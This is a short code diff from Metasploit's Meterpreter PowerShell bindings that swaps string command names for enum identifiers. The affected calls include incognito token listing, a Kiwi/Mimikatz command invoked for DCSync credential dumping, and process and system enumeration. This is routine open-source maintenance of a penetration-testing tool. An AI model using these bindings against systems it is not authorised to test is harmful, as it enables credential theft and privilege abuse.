@@ -173,7 +173,7 @@ namespace MSF.Powershell.Meterpreter
             Tlv tlv = new Tlv();
             tlv.Pack(TlvType.IncognitoListTokensTokenOrder, (int)type);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_list_tokens"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.IncognitoListTokens));
 
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/Kiwi.cs

@@ -158,7 +158,7 @@ namespace MSF.Powershell.Meterpreter
             tlv.Pack(TlvType.KiwiCmd, command);
 
             System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Invoking kiwi_exec_cmd");
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("kiwi_exec_cmd"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.KiwiExecCmd));
             System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Invoked kiwi_exec_cmd");
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/Sys.cs

@@ -29,7 +29,7 @@ namespace MSF.Powershell.Meterpreter
         {
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_sysinfo"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigSysinfo));
 
             if (result != null)
             {
@@ -64,7 +64,7 @@ namespace MSF.Powershell.Meterpreter
         {
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_process_get_processes"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysProcessGetProcesses));
 
             if (result != null)
             {